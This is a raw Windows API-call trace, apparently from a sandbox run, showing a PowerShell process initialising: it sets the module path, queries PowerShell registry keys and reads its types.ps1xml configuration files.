	[0628.433] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10da6c, lpData=0x0, lpcbData=0x10da68*=0x0 | out: lpType=0x10da6c*=0x0, lpData=0x0, lpcbData=0x10da68*=0x0) returned 0x2
	[0628.433] RegCloseKey (hKey=0x2e8) returned 0x0
	[0628.436] CoTaskMemAlloc (cb=0x20c) returned 0x2eb760
	[0628.436] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2eb760 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0628.437] CoTaskMemFree (pv=0x2eb760) 
	[0628.437] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0628.439] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0629.380] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0629.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.380] CoTaskMemFree (pv=0x2edb20) 
	[0629.381] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0629.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.382] CoTaskMemFree (pv=0x2edb20) 
	[0629.388] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0629.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.389] CoTaskMemFree (pv=0x2edb20) 
	[0629.389] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0629.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.389] CoTaskMemFree (pv=0x2edb20) 
	[0629.390] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d8d8 | out: phkResult=0x10d8d8*=0x31c) returned 0x0
	[0629.391] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x10d8ec, lpData=0x0, lpcbData=0x10d8e8*=0x0 | out: lpType=0x10d8ec*=0x1, lpData=0x0, lpcbData=0x10d8e8*=0x74) returned 0x0
	[0629.391] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x10d85c, lpData=0x0, lpcbData=0x10d858*=0x0 | out: lpType=0x10d85c*=0x1, lpData=0x0, lpcbData=0x10d858*=0x74) returned 0x0
	[0629.391] CoTaskMemAlloc (cb=0x78) returned 0x290a60
	[0629.391] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x10d82c, lpData=0x290a60, lpcbData=0x10d828*=0x74 | out: lpType=0x10d82c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10d828*=0x74) returned 0x0
	[0629.391] CoTaskMemFree (pv=0x290a60) 
	[0629.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0629.393] SetErrorMode (uMode=0x1) returned 0x1
	[0629.393] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10d7b0 | out: lpFileInformation=0x10d7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0629.393] SetErrorMode (uMode=0x1) returned 0x1
	[0629.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0629.394] SetErrorMode (uMode=0x1) returned 0x1
	[0629.394] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d7b0 | out: lpFileInformation=0x10d7b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0629.394] SetErrorMode (uMode=0x1) returned 0x1
	[0629.395] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0629.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.395] CoTaskMemFree (pv=0x2edb20) 
	[0629.397] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0629.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.397] CoTaskMemFree (pv=0x2edb20) 
	[0629.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0629.403] SetErrorMode (uMode=0x1) returned 0x1
	[0629.404] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0629.404] GetFileType (hFile=0x320) returned 0x1
	[0629.404] SetErrorMode (uMode=0x1) returned 0x1
	[0629.404] GetFileType (hFile=0x320) returned 0x1
	[0629.406] ReadFile (in: hFile=0x320, lpBuffer=0x2c58f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2c58f38*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.410] ReadFile (in: hFile=0x320, lpBuffer=0x2c58f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2c58f38*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.411] ReadFile (in: hFile=0x320, lpBuffer=0x2c58f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2c58f38*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.412] ReadFile (in: hFile=0x320, lpBuffer=0x2c58f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2c58f38*, lpNumberOfBytesRead=0x10d6e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0629.412] ReadFile (in: hFile=0x320, lpBuffer=0x2c58393, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2c58393*, lpNumberOfBytesRead=0x10d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0629.412] ReadFile (in: hFile=0x320, lpBuffer=0x2c58f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2c58f38*, lpNumberOfBytesRead=0x10d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0629.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0629.415] SetErrorMode (uMode=0x1) returned 0x1
	[0629.415] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d660 | out: lpFileInformation=0x10d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0629.415] SetErrorMode (uMode=0x1) returned 0x1
	[0629.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0629.416] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d748 | out: phkResult=0x10d748*=0x320) returned 0x0
	[0629.416] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d6cc, lpData=0x0, lpcbData=0x10d6c8*=0x0 | out: lpType=0x10d6cc*=0x1, lpData=0x0, lpcbData=0x10d6c8*=0x56) returned 0x0
	[0630.253] CoTaskMemAlloc (cb=0x5a) returned 0x1b311890
	[0630.253] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d69c, lpData=0x1b311890, lpcbData=0x10d698*=0x56 | out: lpType=0x10d69c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d698*=0x56) returned 0x0
	[0630.253] CoTaskMemFree (pv=0x1b311890) 
	[0630.253] RegCloseKey (hKey=0x320) returned 0x0
	[0630.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0630.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0633.243] VirtualQuery (in: lpAddress=0x10c430, lpBuffer=0x10d2f0, dwLength=0x30 | out: lpBuffer=0x10d2f0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0633.252] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0633.252] GetFileType (hFile=0x31c) returned 0x1
	[0633.252] SetErrorMode (uMode=0x1) returned 0x1
	[0633.252] GetFileType (hFile=0x31c) returned 0x1
	[0633.253] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.389] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.333] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.333] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.333] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.333] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.333] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.334] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.334] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.336] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.336] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.336] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.337] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.337] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.338] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.338] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.338] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.342] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.343] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.343] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.343] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.344] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.344] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.345] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.345] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.345] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.346] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.346] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.346] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.347] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.347] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.348] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.348] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.354] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.355] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.355] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.356] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.356] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.356] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.357] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.357] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.358] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0639.358] ReadFile (in: hFile=0x31c, lpBuffer=0x2b22218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2b22218*, lpNumberOfBytesRead=0x10d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0639.358] CloseHandle (hObject=0x31c) returned 1
	[0639.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0639.358] SetErrorMode (uMode=0x1) returned 0x1
	[0639.358] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d660 | out: lpFileInformation=0x10d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0639.359] SetErrorMode (uMode=0x1) returned 0x1
	[0639.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0639.359] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d748 | out: phkResult=0x10d748*=0x31c) returned 0x0
	[0639.359] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d6cc, lpData=0x0, lpcbData=0x10d6c8*=0x0 | out: lpType=0x10d6cc*=0x1, lpData=0x0, lpcbData=0x10d6c8*=0x56) returned 0x0
	[0639.359] CoTaskMemAlloc (cb=0x5a) returned 0x2e7c80
	[0639.359] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d69c, lpData=0x2e7c80, lpcbData=0x10d698*=0x56 | out: lpType=0x10d69c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d698*=0x56) returned 0x0
	[0639.359] CoTaskMemFree (pv=0x2e7c80) 
	[0639.359] RegCloseKey (hKey=0x31c) returned 0x0
	[0639.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0639.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
